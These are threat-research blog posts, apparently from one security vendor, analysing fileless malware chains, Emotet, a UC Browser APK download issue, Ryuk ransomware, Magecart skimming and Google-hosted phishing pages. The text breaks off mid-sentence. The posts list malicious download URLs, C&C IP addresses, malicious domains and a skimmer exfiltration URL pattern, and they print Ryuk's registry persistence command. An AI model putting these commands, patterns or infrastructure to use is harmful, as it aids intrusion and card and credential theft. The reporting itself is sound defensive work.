Criminals frequently get caught because they leave evidence at the scene of the crime—fingerprints, DNA, and the like. Cybercriminals are no different, often leaving files behind on the systems they infect. In an effort to reduce the evidence left behind after an attack, cybercriminals developed fileless malware, a variant of computer-related malicious software that exists exclusively as a computer memory-based artifact. In short, the infection or malware does not write any executable files to the infected system’s hard drive. By leaving few traces behind, malware authors try to postpone detection by security vendors for as long as possible.  During the past few years, the use of fileless infection has been adopted by numerous forms of malware and advanced persistent threats (APTs). These fileless infection chains can employ multiple techniques to deliver the final payload. In one example, the Kovter Trojan stored the payload in a Windows registry. The Hancitor Trojan wrote a payload in the hollow process spawned by shellcode injected from a Word document macro in a Microsoft Word process. Lately, we have been seeing an increase in fileless infection techniques that are leveraging legitimate applications available in the victim’s machine. These techniques do not rely on storing executable files and leave no direct traces on disks, making detection and removal a challenge. In this blog, we will discuss the recent malware campaigns that have used fileless infection mechanisms leveraging legitimate applications. Figure 1: Stats showing hits of fileless infection chains Case 1: njRat Backdoor Although njRat has been around for a long time, we recently observed that this backdoor is being loaded by a fileless infection chain. A .docx file is received as an attachment in a phishing email by the victim. Once the .docx file is opened, the infection cycle begins. Figure 2: The njRat payload loaded by fileless infection   The .docx file contains external references to remote OLE objects to be referenced in the “document.xml.rels,” which is a Rich Text Format (RTF) exploit CVE-2017-0199 that further opens the embedded .doc file containing a Visual Basic for Applications (VBA) macro. Figure 3: The .docx downloading an RTF file   The VBA macro contains an encoded PowerShell script. It downloads the VBScript from “www[.]m9c[.]net/uploads/15676549681.jpg.”  The VBScript then decodes and executes the embedded PowerShell script. The PowerShell script then downloads the encrypted Portable Executable (PE) file from “www[.]m9c[.]net/uploads/15676547971.jpg,” which is the njRat executable. Figure 4: The VBS PowerShell downloads an encoded PE file This VBScript decrypts the PE file, which is a .NET executable that is directly loaded in the memory and runs in the context of an MSbuild.exe. No traces of a disk write are observed and the backdoor njRat silently executes under the hood by communicating with the CnC server “borapegar147[.]ddns[.]net”.   Case 2: Sodinokibi Ransomware The Sodinokibi ransomware (also known as REvil) is one of the most well-known ransomware types in the wild today. It has been on the rise since the threat group behind the malware operation GandCrab announced that it had shut down its operations at the end of May. Recently, we have noticed that Sodinokibi has adopted a fileless mechanism. Figure 5: The Sodinokibi payload loaded by a fileless infection   The fileless infection cycle starts when the victim clicks the BAT file that is received as an attachment in a phishing email. The BAT file contains a PowerShell script containing Base64 encoded expressions. Figure 6: The BAT file received via MalSpam   As shown below in the decoded PowerShell script, this script downloads another PowerShell script containing more than 3,000 lines of code and a Base64-encoded portable executable file (PE) from a pastebin URL and loads it while invoking a function that initiates the attack in the system's memory. Figure 7: The decoded PowerShell expressions   Figure 8: The encoded PE file in PowerShell downloaded from the pastebin This script decodes and provides the PE file to a loader function, which takes care of injecting this file directly into the system's memory. The loaded PE file, which appears to be a DLL, is actually Sodinokibi ransomware. We see no traces of the DLL being saved on the disk as the ransomware silently starts encrypting files on the system.   Case 3: Astaroth Backdoor The Astaroth Trojan is known for stealing credentials, keystrokes, and other system information. An analysis of the backdoor and the infection cycle is covered in detail by Microsoft. The infection chain starts with a victim clicking on an LNK file that is delivered via a phishing email. This LNK file contains an obfuscated WMIC command, which downloads an XSL file containing obfuscated JavaScript.   Figure 9: The obfuscated WMIC command   This JavaScript code downloads a Base64-encoded payload by abusing the Bitsadmin tool and decodes it using the Certutil tool. The payloads are XOR-encrypted PE files except one of the DLL files, which is loaded by leveraging the Regsvr32 tool. Finally, this DLL file decrypts the payload of the backdoor Astaroth and maps it in the Windows userinit process. Figure 10: Obfuscated JavaScript in an XSL file   During the entire attack chain, only system utilities are leveraged to load the final payload. The Astaroth payload executes silently without traces on the filesystem. The case studies described above are based on techniques that take advantage of legitimate applications, such as PowerShell and Windows Management Instrumentation (WMI). However, there are other techniques in which the payload is stored in the registry and delivered by taking advantage of zero-day vulnerabilities in applications or in the operating systems themselves. In one example, the famous Equifax breach used a vulnerability in Apache Struts to deliver the payload. As the PowerShell scripts were stored in the registry, there was no direct trace of the malware being stored.   Conclusion Fileless infection campaigns are difficult to detect. That's why the Zscaler ThreatLabZ team continually monitors malware delivery mechanisms from several sources to ensure that Zscaler customers are protected.     

It’s common for cybercriminals to launch an attack, then shortly thereafter stop the campaign before they are detected. These breaks also give these bad actors a chance to change tactics to, once again, attempt to avoid detection. That’s what operators using the Emotet malware did, taking a short break before bringing Emotet back in a new, more dangerous form. Emotet operators took about a two-month break as command and control (C&C) servers went down in late May and came back online around the end of August. Then, we began observing a new version of this malware around mid-September. Emotet started as a banking trojan in 2014. However, it has morphed into a very prominent threat. Now, it is mostly used for spamming and downloading additional malware threats on a target system. Based on the unique sample count of malware threats seen by the Zscaler Cloud Sandbox, Emotet and its downloaders appear to be among the most prevalent threats in 2019, followed by banking trojans and loaders, such as TrickBot and Ursnif, remote-access trojans (RATs), and off-the-shelf password stealers, such as LokiBot and AZORult. Emotet is modular by design, as it supports multiple modules for different tasks, such as stealing information, spamming, and more. It is also known to download and to be downloaded by other malware families, such as TrickBot and Ursnif. It has also been associated with the Ryuk ransomware.   Email conversation hijacking This year, Emotet employed a new tactic of using stolen email content in spam campaigns. The hijacking of existing email threads can be very effective as recipients are tricked into believing that the email was sent by the other person in the email thread. This trust factor can lead to the victim opening the email (and attachment) and getting infected with Emotet, effectively making the infected system part of an Emotet botnet. Figure 1: Emotet activity from the beginning of June 2019 to mid-September 2019. Figure 2: The new Emotet campaign after the break.   New campaign, new document templates, and new botnets? We observed the following new templates in spammed malicious documents (maldocs) during this new campaign.    Figures 3 and 4: New macro templates (Product Notice and Protected View)   Earlier, there were two Emotet botnets, known as Epoch 1 (E1) and Epoch2 (E2), that were using unique RSA keys to communicate with their C&C. After the break, we noticed three new RSA keys being used, which suggests the possibility of a botnet splitting into multiple botnets. Earlier keys were no longer seen in use and the latest three keys are now being used, which means operators are reorganizing their botnet infrastructure. Already existing RSA keys  -----BEGIN PUBLIC KEY-----\nMHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAMPLgcO0RQdJg/LTgiku57nH4KcLwHCx\nS0lbynOUhHhKjTnmENrMA2idUbK6hI0JRZtii9oJSlb3e5NZiCK+Qr/NB2u7ZNRc\nhG87aibm0ndS9xKDRXcmWwaQkF0PFuOHpwIDAQAB\n-----END PUBLIC KEY----- -----BEGIN PUBLIC KEY-----\nMHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAL9KRKWqcld40xbUZ6hRh+fPNkgJe7K+\n0y1rR0UFqc2SBmnyoR/2Ctd+8MRvU8zri2eNVkVBxCUH1Cthf3AEgRqY2kGva8gJ\nWcqls3j7RztZzqFoL+wM9DNnz/OWuiyPAQIDAQAB\n-----END PUBLIC KEY----- New RSA keys -----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhALk+KlHgOKXm9eDkWu2yN9lanjwOm6W2\nPV0tgr4msNVby2pOJ6S1MZQnQwxl7y6WWzT4kveAQhLmW8JB2M2PDOxZOgVMJH2C\nAtkVW1p/P9jNJWVvjK9SmrbLdIeiKNtRfQIDAQAB -----END PUBLIC KEY----- -----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM426uN11n2LZDk/JiS93WIWG7fGCQmP\n4h5yIJUxJwrjwtGVexCelD2WKrDw9sa/xKwmQKk3b2fUhwnHXjoSpR7pLaDo7pEc\niJB5y6hjbPyrSfL3Fxu74M2SAS0Arj3uAQIDAQAB -----END PUBLIC KEY----- -----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB\nKZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0\nh4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB -----END PUBLIC KEY----- Figure 5: Emotet RSA keys used before and after the break. RSA1 and RSA2 were used before the break. In this new campaign, we saw Emotet using RSA3, RSA4, and RSA5. (1, 2, 3, 4, and 5 are assigned based on their first observation sequence in the wild). Before the break, the two RSA keys didn't share any C&C infrastructure. In this new campaign, two sub-botnets are sharing some infrastructure (as shown in the following screenshots). Figure 6: Emotet RSA keys and C&C infrastructure before the break. Figure 7: RSA keys and C&C infrastructure of the new Emotet campaign. If we check the overall C&C infrastructure and RSA key relationships before and after the break, we can clearly see a reorganization of the C&C infrastructure, which is now divided among three new Epochs. One Epoch is divided into two while the other one is used to create a single botnet with some new C&Cs. Figure 8: The Emotet RSA key and C&C infrastructure relationships before and after the break.   Emotet Downloader payload - Technical analysis The Emotet infection cycle generally starts with spam emails containing malicious macro documents that drop a JavaScript file. This JavaScript file further downloads the Emotet payload from a compromised WordPress website. Almost all the samples we observed were served from compromised WordPress websites (mostly version 5.2.3).  We will take a look at one such malicious document for the purpose of analysis here -  MD5 – 359696113a2156617c28d4f79cc7d44b (“file 20190924 LTR6051.doc”) The macro in the documents is quite simple and straightforward but contains lots of junk. Figure 9: Macro code containing junk instructions.   After removing the junk, this is how the macro code looks. Figure 10: Cleaned macro code.   It gets its text from TextBox1 in UserForm2, then saves that in a "JS" file before executing that file. Figure 11: A user form containing javascript code.   This JavaScript file is heavily obfuscated. More obfuscation is being added to the "JS" code incrementally. As in earlier versions of this downloader, some of the strings and function names were readable and now almost every string is obfuscated. Figure 12: Heavily obfuscated script This script contains an array of strings in variable “a.” First, the elements of the array are shuffled using an anonymous function just after the array definition. Then there is function “b,” which is used to decrypt strings and is extensively used throughout the script. Using this function, we can log the decrypted strings just before they return. Some of the interesting strings include: \+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d)) while (true) {} return (function() {}.constructor("return this")( ) 4|0|7|5|3|1|8|2|6 2|1|0|6|3|5|4 split debug error exception trace http://thewomentour.com/wp-includes/f8yezb9/ WScript.Shell ResponseBody ActiveXObject https://www.marquedafrique.com/k9c5qh/eb1wiw8192/ Scripting.FileSystemObject CreateObject https://thecrystaltrees.com/nofij3ksa/o5523/ http://4excellent.com/wp-includes/ii950106/ WScript.Shell Popup MSXML2.XMLHTTP GET open send http://www.davidleighlaw.com/wp-content/wlfsj15707/ Position Open Type SaveToFile random toString substr 0|1|3|4|2 11|15|13|4|6|9|8|7|5|0|2|3|1|10|16|14|12 return (function() {}.constructor("return this")( ) 7|2|8|0|5|1|4|6|3 2|0|3|4|1 0|14|11|8|3|6|13|9|5|2|1|12|4|10|7 Not Supported File Format There was an error opening this document. The file is damaged and could not be repaired (for example, it was sent as an email attachment and wasn't correctly decoded). The script's functionality can be clearly determined from the decrypted strings. It downloads, saves, and runs its payload from a list of URLs and shows the following message box to trick a user into believing the file is corrupt: Figure 13: An error message to trick a user into believing the file is corrupt. There are multiple URLs embedded in the script files. The following URLs were extracted from this script: http://thewomentour[.]com/wp-includes/f8yezb9/ https://www[.]marquedafrique[.]com/k9c5qh/eb1wiw8192/ https://thecrystaltrees[.]com/nofij3ksa/o5523/ http://4excellent[.]com/wp-includes/ii950106/ http://www[.]davidleighlaw[.]com/wp-content/wlfsj15707/ In this case, the Emotet loader is downloaded from “http://thecrystaltrees[.]com/nofij3ksa/o5523/” (MD5 – 402b20268d64acded1c48ce760c76c47). The Emotet loader already has been extensively analyzed and blogged about, so we won't be getting into technical details of the loader here. Below are artifacts extracted from this sample: RSA key extracted from this sample: -----BEGIN PUBLIC KEY-----\nMHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB\nKZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0\nh4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB\n-----END PUBLIC KEY----- C&C server addresses from the sample: 187[.]188[.]166[.]192:80, 200[.]57[.]102[.]71:8443, 200[.]21[.]90[.]6:8080, 46[.]41[.]134[.]46:8080, 178[.]249[.]187[.]151:8080, 217[.]199[.]160[.]224:8080, 71[.]244[.]60[.]230:7080, 119[.]59[.]124[.]163:8080, 185[.]86[.]148[.]222:8080, 190[.]230[.]60[.]129:80, 178[.]79[.]163[.]131:8080, 186[.]83[.]133[.]253:8080, 179[.]62[.]18[.]56:443, 91[.]205[.]215[.]57:7080, 217[.]113[.]27[.]158:443, 181[.]36[.]42[.]205:443, 190[.]19[.]42[.]131:80, 183[.]82[.]97[.]25:80, 77[.]245[.]101[.]134:8080, 109[.]104[.]79[.]48:8080, 159[.]203[.]204[.]126:8080, 5[.]77[.]13[.]70:80, 189[.]187[.]141[.]15:50000, 46[.]28[.]111[.]142:7080, 46[.]21[.]105[.]59:8080, 189[.]166[.]68[.]89:443, 183[.]87[.]87[.]73:80, 190[.]200[.]64[.]180:7080, 79[.]143[.]182[.]254:8080, 119[.]92[.]51[.]40:8080, 187[.]155[.]233[.]46:443, 89[.]188[.]124[.]145:443, 201[.]163[.]74[.]202:443, 62[.]75[.]160[.]178:8080, 51[.]15[.]8[.]192:8080, 46[.]29[.]183[.]211:8080, 62[.]75[.]143[.]100:7080, 114[.]79[.]134[.]129:443, 190[.]230[.]60[.]129:80, 190[.]117[.]206[.]153:443, 203[.]25[.]159[.]3:8080, 217[.]199[.]175[.]216:8080, 80[.]85[.]87[.]122:8080, 190[.]1[.]37[.]125:443, 23[.]92[.]22[.]225:7080, 81[.]169[.]140[.]14:443, 46[.]163[.]144[.]228:80, 5[.]196[.]35[.]138:7080, 189[.]129[.]4[.]186:80, 151[.]80[.]142[.]33:80, 190[.]221[.]50[.]210:8080, 190[.]104[.]253[.]234:990, 71[.]244[.]60[.]231:7080, 91[.]83[.]93[.]124:7080, 181[.]81[.]143[.]108:80, 181[.]188[.]149[.]134:80, 50[.]28[.]51[.]143:8080, 123[.]168[.]4[.]66:22, 211[.]229[.]116[.]97:80, 201[.]184[.]65[.]229:80, 77[.]55[.]211[.]77:8080, 212[.]71[.]237[.]140:8080, 190[.]38[.]14[.]52:80, 46[.]41[.]151[.]103:8080, 149[.]62[.]173[.]247:8080, 87[.]106[.]77[.]40:7080, 86[.]42[.]166[.]147:80, 109[.]169[.]86[.]13:8080, 88[.]250[.]223[.]190:8080, 138[.]68[.]106[.]4:7080, 200[.]58[.]171[.]51:80 Conclusion Emotet is an ever-evolving threat, employing new tricks and tactics. Although it started as a banking trojan, Emotet is now associated with several different malware campaigns, including ransomware and infostealers. The Zscaler ThreatLabZ team proactively tracks and ensures coverage to block downloaders, payloads, and C&C activity from Emotet and other threats. ThreatLabZ is the research division of Zscaler. To learn more about ThreatLabZ and Zscaler cloud activity, visit https://www.zscaler.com/threatlabz/cloud-activity-dashboard

Recently, when examining the Zscaler cloud for unusual activity, ThreatLabZ researchers found some questionable hits in relation to a particular domain: 9appsdownloading[.]com. Upon analysis, we found these requests being made from a popular browser that's available on Google Play and has more than 500 million downloads to date: the UC Browser app.    Fig. 1: UC Browser on Google Play   As we began to analyze the UC Browser app, we found that the requests were being made to download an additional Android Package Kit (APK) over an unsecured channel (HTTP over HTTPS). Downloading and/or updating components from a third-party source violates Google Play policy, which states: “An app may not download executable code (e.g., dex, JAR, .so files) from a source other than Google Play.” We decided to explore further into the UC Browser app and found the following issues, which will be discussed in detail in this blog:   Downloading an additional APK from a third party – in violation of Google Play policy Communication over an unsecured channel – opening doors to man-in-the-middle attacks Dropping an APK on external storage (/storage/emulated/0) – allowing other apps, with appropriate permissions, to tamper with the APK We found another app called UC Browser Mini from the same developer with the same functionality and issues, and it dropped the same additional APK from a remote server. The screenshot below shows UC Mini on Google Play.   Fig. 2: UC Browser Mini (UC Mini)   It is important to note that these issues have the potential to affect millions of Android users because the UC Browser app has been downloaded 500 million+ times and UC Mini has been downloaded 100 million+ times. The ThreatLabZ team has been in contact with Google, whose teams are investigating the apps.  Timeline: August 13, 2019: Zscaler reported policy violation to Google. August 13, 2019: Google promptly responded. Case assigned to an investigation team.  August 13 – September 25, 2019: Follow-up emails with research details. September 27, 2019: Google confirmed policy violation by UC Browser and UC Mini. Google contacted UC developers to update the apps and remediate the policy violation.  Update: After Google's intervention, the Zscaler research team noticed that the latest version of both the apps, UC Browser and UC Mini, have stopped downloading the third-party app store.   Technical Details of UC Browser Name: UC Browser Package Name: com.UCMobile.intl Installs: 500,000,000+ (500M +) Developer: UCWeb Singapore Pte. Ltd.   1. Downloading an APK from a third party Upon finding the UC Browser app as the main culprit, we decided to dig deeper into our analysis of the app. As soon as the app is installed, it displays basic activities (Android screens) to set up default language, topics of interest, location, and so on.  Fig. 3: UC Browser app icon and initial Android activity   After some initial requests for news and notifications, the app sends multiple requests with redirections and finally drops an APK on to the user’s device. The screenshot below illustrates the chain of requests and redirects taking place:    Fig. 4 Unsecured requests for APK download   This functionality of dropping another APK from a third-party source clearly violates Google Play’s policy, which includes the following: “An app distributed via Google Play may not modify, replace, or update itself using any method other than Google Play's update mechanism. Likewise, an app may not download executable code (e.g., dex, JAR, .so files) from a source other than Google Play. This restriction does not apply to code that runs in a virtual machine and has limited access to Android APIs (such as JavaScript in a webview or browser).” During our analysis, we found the APK being dropped on external storage but we did not find the APK being installed. It is possible that this functionality is still under development or there may be other reasons it wasn’t installed, such as exception, disabled unknown-sources option, or rooted device.    2. Communication over an unsecured channel  The APK was downloaded over an unsecured channel (HTTP over HTTPS), opening the possibility for man-in-the-middle (MiTM) attacks. In our research, we came across a recent Dr. Web blog post that talks about similar issues they saw with UC Browser downloading and installing libraries from remote servers. In that case, they talk about libraries being downloaded over HTTP and, in our case, we saw a completely new APK being dropped (this APK is also analyzed in the latter part of this blog).  The consequences of downloading and installing components over unsecured channels were well addressed in the Dr. Web blog, along with the MiTM vulnerability, so we will not address those issues further. We noticed that the app analyzed by Dr. Web researchers had the same icon as our sample, but had a different full-name and a different developer. The screenshots below show the Dr. Web sample (left) compared to the Zscaler sample (right): Fig. 5: UC Browser app samples: Dr. Web (left) and Zscaler (right)    It could be that the same app had been uploaded again on Google Play with a different name and developer along with modified or enhanced code to download additional APKs.    3. Dropping an APK on external storage We also noticed that the additional APK being dropped by this app is stored on external storage, which is world-readable by default. The screenshot below shows the location of the dropped APK: Fig. 6: Dropped APK storage location An APK being placed on external storage, or any other app with storage permission (android:name=android.permission.READ/WRITE_EXTERNAL_STORAGE) can have access to this location and can tamper with the downloaded APK.    Analysis of the dropped APK During our analysis, we noted that UC Browser was dropping the APK but not installing it. It is unclear whether this is due to the fact that the functionality is still under development or if there is another reason the APK is not installing. But we did want to find out what the APK contained, so we decided to manually install it and have a look inside. To our surprise, we found that the APK was actually a third-party app store named “9 Apps” with the package name com.mobile.indiapp.     Fig. 7: 9Apps app install process   After installing the app, it scans the device for installed apps. The app’s scanning and further activities can be seen in the screenshots below: Fig. 8: 9Apps initial activities   We also saw several adult apps available for download in this third-party app store. These apps can be seen in the screenshot below:    Fig. 9: Adult apps on 9Apps store   We tried downloading a small-sized app from the 9Apps store and, to our surprise, the app was downloaded from 9appsdownloading[.]com. This is the same domain that we mentioned at the beginning of this blog. The screenshot below shows the functionality in action:    Fig. 10: Sample APK download requests   Further scrutiny of Zscaler cloud traffic showed multiple requests for APK downloads from this 9appsdownloading[.]com domain. Within the last month, we found 130+ such requests. The hits can be seen in the Zscaler cloud dashboard:  Fig. 11: Zscaler dashboard showing the domain’s activity   Conclusion The tactics used by UC Browser and UC Mini violate Google Play security policies and make it possible for any malicious app to gain entry into a user's device. While 9Apps, an app store for Android apps, is not a malicious site, we searched the domain using VirusTotal, which showed a number of detections: Fig. 12: VirusTotal search for the domain   It is too early to determine exactly what the UC Browser developers intended with their third-party APK, but it is clear that they are putting users at risk. And with more than 500 million downloads of UC Browser, that is a significant threat. Because UC Browser downloads an unknown third-party app to devices over unsecured channels, those devices can become victim to man-in-the-middle (MiTM) attacks. Using MiTM, attackers can spy on the device and intercept or change its communications. The UC Browser app’s use of unsecured channels also allows attackers to install an arbitrary payload on a device that can perform a variety of activities, such as display phishing messages designed to steal personal data, including usernames, passwords, and credit card numbers. Once a user device has been compromised, and that compromised device connects back at the office, attackers have the ability to establish a foothold in your network, so they can snoop, spread malware, or steal data.   

Ryuk ransomware had a disturbingly successful debut, being used to hit at least three organizations in its first two months of activity for more than $640,000 in ransom. Several attacks followed, where the attackers demanded even greater amounts of ransom.    The attackers were able to demand and receive high ransoms because of a unique trait in the Ryuk code: the ability to identify and encrypt network drives and resources, as well as delete shadow copies on the endpoint. By carrying out these actions, the attackers could disable the Windows System Restore option, making it impossible for users to recover from the attack without external backups. Unlike other ransomware, Ryuk is distributed by common botnets, such as Trickbot and Emotet, which have been widely used as banking trojans. In this blog, we'll provide an analysis of how the Ryuk ransomware can encrypt a victim's data while blocking the infected system from restoring the data.    Analysis Ryuk dropper contains both 32-bit and 64-bit payloads. The dropper checks to see if it is being executed in a 32-bit or 64-bit OS using the "IsWow64Process" API and drops the payload accordingly. It also checks the version of the operating system. If it is executed in Windows XP, it drops the Ryuk payload at "C:\Documents and Settings\Default User\{random-5 char}.exe". If it is executed in Windows Vista or later versions of Windows, it drops the file at "C:\users\Public\{random-5 char}.exe”. Next, it executes the payload using the ShellExecuteW API.   Persistence mechanism Ryuk adds the following registry key so it will execute at every login. It uses the command below to create a registry key: ""C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Public\{random-5 char}.exe" /f"   Process injection Ryuk injects its main code into several remote processes. Ryuk enumerates the process by calling the CreateToolhelp32Snapshot API and injecting its code in all the processes except the ones named explorer.exe, lsaas.exe and csrss.exe, telling it that it should not be executed by the NT AUTHORITY. Ryuk ransomware terminates processes and stops services contained on a predefined list. These processes and services are mostly antivirus tools, databases, backups, and other software. The screenshot below shows the list of services stopped by Ryuk. Figure 1: The list of services disabled by the Ryuk ransomware. The screenshot below shows the list of processes terminated by Ryuk. Figure 2: The list of processes terminated by the Ryuk ransomware. Ryuk also deletes shadow copies and other backup storage files by using a .BAT file so that the infected system can’t restore data. Below is the list of commands used by Ryuk to perform these deletions. Figure 3: The list of commands used by Ryuk ransomware to delete shadow copies and other backup storage files.   Encryption and similarity with Hermes ransomware Ryuk uses a combination of RSA (asymmetric) and AES (symmetric) encryption to encrypt files. Ryuk embeds an RSA key pair in which the RSA private key is already encrypted with a global RSA public key. The sample generates an AES-256 key for each file and encrypts the files with an AES key. Further, the AES key is encrypted with an embedded public key and is appended at the end of the encrypted file. If all the samples contain the same RSA key pair, then after getting access to one private key, it's easy to decrypt all of the files. But Ryuk contains a different RSA key pair for every sample. Some samples append the ".RYK" extension and some don't append any extensions after encrypting the files. Ryuk has a common feature with Hermes ransomware. During encryption, Ryuk adds a marker in the encrypted file using the keyword “HERMES”. Ryuk checks for the HERMES marker before encrypting any file to know if it has been already encrypted. The screenshot below displays the HERMES marker and encrypted AES key appended at the end of the encrypted file. Figure 4: The HERMES marker and the encrypted AES key. Ryuk encrypts files in every drive and network shared from the infected system. It has whitelisted a few folders, including “Windows, Mozilla, Chrome, Recycle Bin, and Ahnlab” so it won’t encrypt files inside these folders. Ryuk drops its ransom note, named RyukReadMe.txt, in every directory. Ryuk asks for the ransom in bitcoin, providing the bitcoin address in the ransom note. Ryuk contains different templates for the ransom note. Below is a screenshot for RyukReadMe.txt file. Figure 5: Ryuk ransomware ransom note. After completing the encryption, Ryuk creates two files. One is “Public” and contains an RSA public key while the second is “UNIQUE_ID_DO_NOT_REMOVE” and contains a unique hardcoded key.   Conclusion While most ransomware is spread using spam email and exploit kits, Ryuk is delivered as a payload of the Emotet and Trickbot malware. Looking at the encryption process and ransom demands, Ryuk is targeting big enterprises in the hopes of large payoffs. Zscaler ThreatLabZ team continues to monitor this threat to ensure that Zscaler customers are protected.   IOCs MD5 5AC0F050F93F86E69026FAEA1FBB4450 6CDCB9F86972EFC4CFCE4B06B6BE053A 31BD0F224E7E74EEE2847F43AAE23974 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  Rajdeepsinh Dodia and Amandeep Kumar are security researchers on the Zscaler ThreatLabZ team.

During alert monitoring, ThreatLabZ researchers came across multiple cases of shopping sites being compromised and injected with a skimming script. This injected script looks for the payment method and personally identifiable information (PII) and captures supplied financial information which is then sent to an adversary-controlled gate server even before the user hits the submit form. There have been multiple reports published related to Magecart activity, and ThreatLabZ has blogged about the hacker group’s activities in the past. (Read previous blogs from September 2018 and July 2019.) In this blog, we will provide an overview of the current skimming campaigns with an analysis of those that use compromised sites to host the skimmer code and those that use newly registered domains. The following screen capture shows the Magecart hits we observed over the last 90 days. The activity appears to be fairly consistent week to week, with a spike at the end of the analysis period, and we believe it is likely to continue. Figure 1: Hits on compromised sites over 90 days (x-axis=date, y-axis=hits)   Most of the impacted websites are in the shopping category. The following graph shows the cloud-wide statistic for the number of unique domains per category for the sites impacted. Figure 2: URL categories of impacted sites (x-axis=URL category, y-axis=unique domain counts) This Magecart-based skimming campaign did not reveal any novel tactics, tools, or procedures, but it seems to be more structured in terms of the scripts being used across multiple compromises, similar gate URL parameter patterns, and the algorithm used for data encoding. The cycles we observed were generally the same, but we did see some differences. Some use obfuscation to hide the script injection code and use another compromised site for hosting the skimmer script, while others make use of newly registered domains for skimmer script hosting. Regardless of the loading script, the skimmer code possesses little to no obfuscation.   Cycle 1: Compromised site loads skimmer code from another compromised site The following image shows a Fiddler session to demonstrate the skimming chain. Figure 3: Fiddler session for Magecart skimming   In these skimming campaigns, we can see compromised sites sending captured payment information to domains that are either newly registered or compromised and under the control of an adversary. In the following example, the gate site is compromised as well and was registered on 2013-03-19. Figure 4: Example of injected script and skimmer code   The way this skimmer code operates is to wait for the user to fill in the personal information and payment method and capture it all before the user hits the submit button. This captured information is then encoded using the Base64 algorithm and sent to the gate URL in a GET request. Figure 5: Skimmer script sending base64 encoded PII and Payment Information GET Request   Cycle 2: Compromised site loads skimmer code from a newly registered domain As shown in the image below, the skimming script is being hosted on a domain registered just 10 days before this analysis. Figure 6: Compromised site leveraging skimmer script from a newly registered domain   All the skimmer scripts we’ve identified so far are similar, and we observed the following common gate URL pattern: hxxps://domain/{path}.(php|js)?hash=[base64data]   Figure 7: Skimmer script differences   We saw multiple cases where the same skimmer code locations were being used in multiple compromised sites, including: custommagnetsdirect[dot]com/catalog/view/javascript/jquery/jquery.sticky.js matteola[dot]com/js/varien/js.js The image below shows examples of skimmer code locations being used for multiple compromised sites.   Figure 8: The same skimmer code locations used in multiple compromised sites   Conclusion Magecart has been successful for years because attackers have improved their techniques for injecting malicious code and hiding it from detection. Now, we are seeing attackers able to steal payment card information before it is even submitted. Zscaler ThreatLabZ actively tracks such campaigns and protects customers from skimming and other types of data-stealing attacks. Appendix Common skimmer JS URL patterns /5d1cbc8c073d4.js /baypressservices/baypr.js /check_cvv2_number_script.js /datetimepicker/bootstrap-datetimepicker.min.js /images/js/googleapi.js /javascript/checkcheckout.js /5d4cdc4cdf344.js /js/afterpay/checkout/idev_onestep.js /js/check_analystic.js /js/extjs/fix-defer-after.js /js/footer-link.js /js/front-scripts.min.js /js/lib/ccard.js /js/mage/cookies.js /js/mage/google.js /js/prototype/prototype.js /js/scriptaculous/print.js /varien/email.js /varien/js.js /varien/mail.js /my/vmart.js /qcore.js /rimzoneonline/code.js /silver/acor.js /wp-includes/js/jquery/jquery.js   Bad domains Creation date api-googles[dot]com 2019-03-30T18:40:29Z cloudflara[dot]org 2019-07-10T19:16:22Z developer-js[dot]info 2019-03-07T21:29:25Z facebookfollow[dot]com 2019-07-21T02:29:39Z googletagmanager-service[dot]com 2019-02-09T23:28:49Z gooqleadvstat[dot]com 2019-09-13T11:22:10Z jquery-cdn[dot]top 2018-09-28T07:41:02Z jquery-js[dot]com 2017-01-02T11:21:35Z jquery[dot]su 2019-02-27T19:12:36Z jquerycodemagento[dot]com 2019-08-11T13:05:43Z magento-security[dot]org 2017-11-14T16:32:41Z magento-track[dot]com 2018-12-28T20:44:11Z script-analytics[dot]com 2019-08-13T22:16:38Z  

In July, Zscaler ThreatLabZ posted a blog about a rise in the use of Microsoft Azure domains to host phishing attacks. Our researchers recently detected similar activity on the Google domains Appspot.com and Web.app. Appspot.com is a cloud computing platform for developing and hosting web applications in Google-managed data centers. Web.app is a mobile platform used for building mobile apps hosted by Firebase, which is Google’s mobile app platform. These campaigns use SSL certificates issued by Appspot.com and Web.app, and they have well-designed login pages that attempt to spoof popular brands widely used in business, such as Dropbox Business, Microsoft Outlook and SharePoint, and DocuSign. They are designed to capture login credentials, which are sent to a remote server. In the analysis that follows, we’ll describe the techniques these campaigns use to avoid detection and we’ll show the phishing domains and the locations where the user credentials are being sent. As of this date, many of these subdomains on appspot.com and web.app are not being flagged by VirusTotal.   Fig 1: VirusTotal detections for the subdomains   Web.app hosted phishing pages The following screenshots are phishing pages of some of the sites that have used an SSL certificate issued by Web.app. Fig 2: Microsoft login phishing page    Fig 3: SSL certificate page of the hosted phishing URL   Appspot.com hosted phishing pages Fig 4: Google Drive login phishing page   Fig 5: Outlook login phishing page   Fig 6: Dropbox login phishing page   Fig 7: DocuSign login phishing page     Fig 8: OneDrive login phishing page   Fig 9: OneDrive login phishing page   Fig 10: OneDrive login phishing page Evasion techniques This is a sophisticated phishing campaign as demonstrated by the well-designed phishing pages that are difficult to distinguish from legitimate pages. In addition, the attackers are using the latest tactics to evade detection from scan engines, with most of the code written in an external JavaScript file. This filename is 32 characters long and different for every site.  Below is the source code of the phishing pages; the highlighted part is the external JavaScript mentioned above. Fig 11: Source code of phishing page Fig 12: Source code of phishing page In the above landing page source code of the phishing URL, there is less content, no brand name, and no catchy strings that are common in most phishing campaigns. This 